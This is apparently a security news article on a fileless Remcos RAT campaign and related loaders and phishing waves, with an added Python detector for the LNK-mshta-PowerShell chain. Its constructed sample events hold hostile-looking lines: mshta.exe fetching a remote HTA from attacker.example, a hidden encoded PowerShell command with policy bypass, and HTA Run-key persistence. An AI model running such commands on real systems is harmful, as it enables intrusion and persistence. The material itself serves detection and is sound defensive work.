Cybersecurity researchers have shed light on a new malware campaign that uses a PowerShell-based shellcode loader to deploy a remote access trojan called Remcos RAT.
"Threat actors delivered malicious LNK files embedded within ZIP archives, often disguised as Office documents," the researchers noted in a technical report. "The attack chain leverages mshta.exe for proxy execution during the initial stage."
The latest wave of attacks, as detailed by Qualys, uses tax-related lures to entice users into opening a malicious ZIP archive containing a Windows shortcut (LNK) file, which in turn invokes mshta.exe, a legitimate Microsoft tool used to run HTML Application (HTA) files.
The binary is used to execute an obfuscated HTA file named "Xlab22.hta" hosted on a remote server, which contains Visual Basic Script code to download a PowerShell script, a decoy PDF, and another HTA file similar to Xlab22.hta named "311.hta". The HTA file is also configured to modify the Windows Registry so that "311.hta" launches automatically at system startup.
Once the PowerShell script is executed, it decodes and reconstructs a shellcode loader, which ultimately proceeds to launch the Remcos RAT payload entirely in memory.
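The chain above (LNK from a ZIP, mshta.exe fetching a remote HTA, a hidden PowerShell stage, and a Run-key entry for the dropped HTA) is well suited to behavioural detection on endpoint telemetry. The following is an added example, not code from Qualys or from the report: it runs three rules over constructed Sysmon-like events (EventID 1 process creation, EventID 13 registry value set) and correlates a PowerShell child with the mshta.exe parent that loaded a remote HTA. The host name attacker.example, the PIDs, the SID and the paths are placeholders; only the file names Xlab22.hta and 311.hta come from the article.

```python
"""Behavioural detection for the LNK -> mshta.exe -> remote HTA -> PowerShell chain.

Added example, not code from the Qualys report. The telemetry below is
constructed in a Sysmon-like shape: EventID 1 = process creation,
EventID 13 = registry value set. attacker.example, the PIDs, the SID and
the paths are placeholders; only Xlab22.hta / 311.hta come from the article.
"""
import re

SAMPLE_EVENTS = [
    # 1. LNK opened from Explorer launches mshta.exe with a remote HTA (constructed)
    {"EventID": 1, "ProcessId": 4120, "ParentProcessId": 1200,
     "Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" http://attacker.example/Xlab22.hta'},
    # 2. The HTA's VBScript spawns a hidden, encoded PowerShell (shellcode loader stage)
    {"EventID": 1, "ProcessId": 4188, "ParentProcessId": 4120,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell.exe -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    # 3. Run-key persistence pointing at the dropped 311.hta
    {"EventID": 13, "ProcessId": 4120, "Image": r"C:\Windows\System32\mshta.exe",
     "TargetObject": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"mshta.exe C:\Users\victim\AppData\Roaming\311.hta"},
    # Benign noise: a local vendor HTA, an interactive PowerShell, a normal Run entry
    {"EventID": 1, "ProcessId": 5300, "ParentProcessId": 1200,
     "Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\help.hta"'},
    {"EventID": 1, "ProcessId": 5412, "ParentProcessId": 1200,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell.exe"},
    {"EventID": 13, "ProcessId": 900, "Image": r"C:\Program Files\Vendor\setup.exe",
     "TargetObject": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\VendorAgent",
     "Details": r"C:\Program Files\Vendor\agent.exe"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
# hidden window, encoded command, execution-policy bypass: typical in-memory loader flags
PS_FLAGS_RE = re.compile(
    r"(^|\s)-(w(indowstyle)?\s+hidden|e(nc|ncodedcommand)?\s|e(p|xecutionpolicy)\s+bypass)",
    re.IGNORECASE)
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process(ev):
    """Rules for EventID 1 (process creation)."""
    image, parent = basename(ev["Image"]), basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    out = []
    if image == "mshta.exe" and URL_RE.search(cmd):
        out.append({"rule": "mshta_remote_hta", "severity": "medium",
                    "pid": ev["ProcessId"], "evidence": cmd})
    if image in POWERSHELL and parent in SCRIPT_HOSTS:
        out.append({"rule": "script_host_spawned_powershell", "severity": "medium",
                    "pid": ev["ProcessId"], "evidence": cmd,
                    "evasion_flags": bool(PS_FLAGS_RE.search(cmd))})
    return out


def check_registry(ev):
    """Rule for EventID 13: a Run/RunOnce value whose data launches an HTA."""
    target, details = ev.get("TargetObject", ""), ev.get("Details", "").lower()
    if RUN_KEY_RE.search(target) and (".hta" in details or "mshta" in details):
        return [{"rule": "hta_run_key_persistence", "severity": "high",
                 "pid": ev["ProcessId"], "evidence": f"{target} = {ev['Details']}"}]
    return []


def detect(events):
    """Apply the rules in event order and correlate: PowerShell whose parent is an
    mshta.exe that loaded a remote HTA is escalated to 'high' as the full chain."""
    findings, remote_hta_pids = [], set()
    for ev in events:
        hits = check_process(ev) if ev["EventID"] == 1 else (
               check_registry(ev) if ev["EventID"] == 13 else [])
        for f in hits:
            if f["rule"] == "mshta_remote_hta":
                remote_hta_pids.add(ev["ProcessId"])
            if (f["rule"] == "script_host_spawned_powershell"
                    and ev.get("ParentProcessId") in remote_hta_pids):
                f["severity"] = "high"
                f["chain"] = "remote HTA -> PowerShell (in-memory loader stage)"
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f["severity"].upper(), f["rule"], f["pid"], f["evidence"][:70])
```

The local vendor HTA, the interactive PowerShell and the ordinary Run entry produce no findings, while the three malicious events each fire one rule and the PowerShell child is raised to high severity because its parent PID is the mshta.exe that loaded a remote HTA. The registry rule is what catches the 311.hta persistence even when the in-memory stages leave nothing else on disk.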
Remcos RAT is a well-known malware that gives threat actors complete control over compromised systems, making it an ideal tool for cyber espionage and data theft. A 32-bit binary compiled with Visual Studio C++ 8, it has a modular structure and can collect system metadata, log keystrokes, capture screenshots, monitor clipboard data, and retrieve a list of all installed programs and running processes.
In addition, it establishes a TLS connection to a command-and-control (C2) server at "readysteaurants[.]com", maintaining a persistent channel for data exfiltration and remote control.
This is not the first time fileless versions of Remcos RAT have been observed in the wild. In November 2024, Fortinet FortiGuard Labs detailed a phishing campaign that deployed the malware filelessly using themed lures.
What makes this attack method attractive to threat actors is that it lets them operate unnoticed by many traditional security solutions, since the malicious code runs directly in the computer's memory and leaves very few traces on disk.
"The rise of PowerShell-based attacks like this new Remcos RAT variant demonstrates how threats are evolving to evade traditional security measures," said J. Stephen Kowski, Field CTO at SlashNext.
"This fileless malware operates directly in memory, using LNK files and mshta.exe to execute obfuscated PowerShell scripts that can bypass conventional protections. Advanced email security that can detect and block malicious LNK attachments before they reach users is essential, as is monitoring for suspicious behavior."
The disclosure comes as Palo Alto Networks Unit 42 and Threatray detailed a new .NET loader used to drop a wide range of information stealers and RATs such as Agent Tesla, NovaStealer, Remcos RAT, VIPKeylogger, XLoader, and XWorm.
The loader has three stages that work in tandem to deploy the final payload: a .NET executable that embeds the second and third stages in encrypted form, a .NET DLL that decrypts and loads the next stage, and a .NET DLL that manages the deployment of the core malware.
"While earlier versions embedded the second stage as a hard-coded string, later versions use a bitmap resource," Threatray said. "The first stage extracts and decrypts this data, then executes it in memory to launch the second stage."
Unit 42 described the use of bitmaps to hide the malicious payloads as a technique that can bypass traditional security mechanisms and evade detection.
The findings also coincide with the emergence of multiple phishing and social engineering campaigns designed to steal credentials and deliver malware:
- Using a trojanized version of the KeePass password manager, codenamed KeeLoader, to drop a Cobalt Strike Beacon and steal KeePass database data, including administrative credentials. The malicious installers are hosted on typosquatted domains promoted through Bing ads.
- Using ClickFix lures and URLs embedded in PDF documents, along with a series of intermediate dropper URLs, to deploy Lumma Stealer.
- Using weaponized Microsoft Office documents to deploy the Formbook information stealer, protected by a malware distribution service referred to as Horus Protector.
- Using blob URIs to load a credential-phishing page locally, with the blob URIs served through allowlisted pages (e.g., onedrive.live[.]com) that redirect victims to a malicious domain hosting the HTML phishing page.
- Using RAR archives disguised as setup files to distribute NetSupport RAT in attacks targeting Ukraine and Poland.
- Using phishing kits to distribute HTML attachments containing malicious code that captures victims' account credentials, including Gmail, and exfiltrates them to a Telegram bot called "Blessed Logs", which has been active since February 2025.
These developments have also been accompanied by campaigns powered by artificial intelligence (AI) that use polymorphic tricks, mutating in real time to evade detection. These include modifying the email subject, sender names, and body content to slip past signature-based detection.
"AI has given threat actors the ability to automate malware, scale attack campaigns, and craft personalized phishing messages with surgical precision," Cofense noted.
"These evolving threats are increasingly able to bypass traditional email filters, underscoring the limits of perimeter-only defenses and the need for post-delivery detection. AI has also allowed them to overcome traditional defenses through polymorphic phishing that changes content on the fly. The result: deceptive messages that are harder to detect."